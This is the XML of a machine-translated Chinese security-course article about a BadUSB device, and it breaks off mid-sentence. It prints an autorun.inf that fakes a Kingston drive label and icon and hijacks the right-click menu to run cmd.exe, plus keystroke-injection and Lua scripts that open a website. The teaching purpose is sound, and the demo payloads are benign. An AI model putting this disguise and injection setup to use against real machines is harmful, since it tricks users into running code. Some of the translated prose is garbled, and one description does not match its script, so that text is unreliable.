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jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId10.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId72.jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId21.jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId69.jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId50.jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId44.jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId17.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId63.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId54.jpg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/rId13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9">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Описание эксперимента BadUSB</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3177612"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Курс по информационной безопасности 2 — описание эксперимента BadUsb" title="" id="11" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="https://pica.zhimg.com/70/v2-6f1c11ea9bc36f022c19e1722ca12ce1_1440w.image?source=172ae18b&amp;biz_tag=Post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7" w:name="X99810027cedc73b5f013c18857eb58c3ff69bf0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Курс по информационной безопасности 2 — описание эксперимента BadUsb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:hyperlink r:id="rId16">
        <w:r>
          <w:drawing>
            <wp:inline>
              <wp:extent cx="1270000" cy="1270000"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:docPr descr="Чжоу Цзинчэн" title="" id="14" name="Picture"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr descr="https://picx.zhimg.com/v2-c11246453be981e4a3ae3f35106b718a_l.jpg?source=32738c0c&amp;needBackground=1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hyperlink r:id="rId16">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Чжоу Цзинчэн</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId20">
        <w:r>
          <w:drawing>
            <wp:inline>
              <wp:extent cx="914400" cy="914400"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:docPr descr="" title="" id="18" name="Picture"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr descr="https://picx.zhimg.com/v2-2ddc5cc683982648f6f123616fb4ec09_l.png?source=32738c0c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t xml:space="preserve">Обладатель профессионального и технического сертификата по компьютерным технологиям и программному обеспечению</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">29 человек поставили лайк статье</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="29" w:name="X977c29d98cd38cf9c4d17ac73316b0daa111328"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. Ключевые инструкции</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Настройте клавиши</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Нажмите и удерживайте кнопку настройки, чтобы вставить его в компьютер и отпустить, он перейдёт в режим конфигурации badusb, который отображается на USB-флешке на компьютере, режим атаки отключён, атака не будет атакована:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="397789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https://pica.zhimg.com/v2-86a0e18c3d1b8afef37a8687cae3eed2_1440w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7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USB-флешка, отображаемая при настройке режима</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Откройте USB-флешку в USB-флешке.</w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">autorun.inf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">То есть конфигурационный файл, где упрощённая версия содержит только один конфигурационный файл — autorun.inf. Премиум-версия имеет два конфигурационных файла: autorun.inf для атак на автозапуск,</w:t>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">luac.out</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">Используется для bad_usb атак.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="211281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https://pic4.zhimg.com/v2-7e5005bae2e5abbd33f533348844a09d_1440w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2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Конфигурационные файлы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Используйте Notepad, чтобы открыть профиль и компиляцию</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="32" w:name="Xb808b44ad95e9276d5b435bdc55f778a406d4a1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Описание профиля</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Существует два способа атаки: атаки AutoRun и атаки BadUSB</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="30" w:name="Xf267d4ebd2a870ed25a72c3df88c4473200c759"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Атака AutoRun</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Пример конфигурации (содержимое файла autorun.inf):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;AutoRun攻击的配置块，支持同时进行两种攻击。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[AutoRun]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">autoplay=true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;伪装的U盘图标</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">icon=c:\windows\system32\shell32.dll,79</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;驱动器名称</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">label=Kingston</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;攻击载荷，此处为调用cmd打开网页</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">open=cmd.exe /c "start http://www.nnnxxx.cn"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">run=cmd.exe /c "start http://www.nnnxxx.cn"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;劫持右键菜单</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell\open=打开(&amp;amp;O)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">shell\open\Command=cmd.exe /c "start http://www.nnnxxx.cn" </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell\opennewwindow=在新窗口中打开(&amp;amp;E)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shell\opennewwindow\Command=cmd.exe /c "start http://www.nnnxxx.cn"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Триггерным условием атаки Autorun является открытие диска жертвой. Когда жертва открывает диск, атака автоматически настраивается.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31" w:name="X0dde24aa0ffa9daf5912efadd7150d8bbf2631f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Упрощённая версия bad_usb атаки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Принцип атаки badusb заключается в маскировке под клавиатуру и автоматическом вводе настроенных клавиш в компьютер. Простая автоматическая поддержка ограничена, и все поддерживаемые команды следующие:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[Enter]：按下回车键</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[Shift]：按下Shift键</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[Capslock]：切换大小写</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[Win]：按下Win键</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[Win+R]：打开“运行”窗口</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[Alt+F4]：关闭当前窗口</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[Win+D]：显示桌面</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[Win+L]：锁定计算机</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[Win+E]：打开Windows资源管理器</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[Ctrl+Alt+Del]：打开安全选项</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[Delay]：等待500毫秒，两个Delay为1秒，以此类推</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[Format]：格式化储存(U盘自身）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">正常按键比如a-z直接输入即可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В упрощённой версии конфигурационный файл badusb — это тот же файл, что и autorun, просто добавьте следующее содержимое, упрощённая версия — пример (содержимое файла autorun.inf):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[BadUSB]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Win+R]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Delay][Delay]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">notepad[Enter]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Delay]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Hello World[Enter]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Win+R]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Delay]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Delay]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.nnnxxx.cn</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Enter]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[BadUSB]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;AutoRun攻击的配置块，支持同时进行两种攻击。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[AutoRun]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">autoplay=true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;伪装的U盘图标</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">icon=c:\windows\system32\shell32.dll,79</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;驱动器名称</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">label=Kingston</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;攻击载荷，此处为调用cmd打开网页</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">open=cmd.exe /c "start http://www.nnnxxx.cn"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">run=cmd.exe /c "start http://www.nnnxxx.cn"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;劫持右键菜单</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell\open=打开(&amp;amp;O)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">shell\open\Command=cmd.exe /c "start http://www.nnnxxx.cn" </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell\opennewwindow=在新窗口中打开(&amp;amp;E)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shell\opennewwindow\Command=cmd.exe /c "start http://www.nnnxxx.cn"</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="35" w:name="Xd79c089c4627f3ceb55c0f769e5b4c07b8a2d73"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Продвинутая версия bad_usb атаки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Продвинутая версия использует высокопроизводительные чипы и хранилище, а также имеет улучшенные функции, но сложность использования также значительно возросла, и рекомендуется использовать простую версию для новичков. Главное отличие премиум-версии от простой версии заключается в том, что продвинутая версия предоставляет полный язык программирования, поддерживающий управляющие операторы, например, если, хотя и т.д., пользователи могут самостоятельно писать более сложные программы, а продвинутая версия поддерживает все симуляции клавиш и мыши, поддерживая случайные числа и пользовательские задержки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Встроенный интерпретатор премиум-версии — Lua, поддерживающий Lua 4.0 и предыдущий синтаксис.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Продвинутая версия автозапусковых атак также использует конфигурационный файл autorun.inf. Однако премиум-версия badUsb-атак больше не заимствует файл autorun.inf, а имеет отдельный конфигурационный файл luac.out, что означает, что премиум-версия имеет два конфигурационных файла: один — autorun.inf, который используется для автозапуска. Один из них — файл luac.out, который используется для атак badUSB.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Например, напишите следующий скрипт lua, предварительно скомпилируйте его и вставьте на USB-флешку</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pp=1000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">i=3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(1000)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">raw_key(128,21)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(500)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">keys('notepad')</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">keys('\n')</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(500)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">while i&amp;gt;1 do   </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   keys('Hello-') </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   delay(pp)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   i = i-1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">end </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(500)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">raw_key(128,21)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(500)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">keys('http://www.nnnxxx.cn') </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">keys('\n')</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(pp)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mouse(0,100,0,0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(pp)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mouse(0,0,100,0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delay(pp)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">null_mouse();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Инструмент управляет компьютером выводом 10 строк bb, затем открывает Run,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
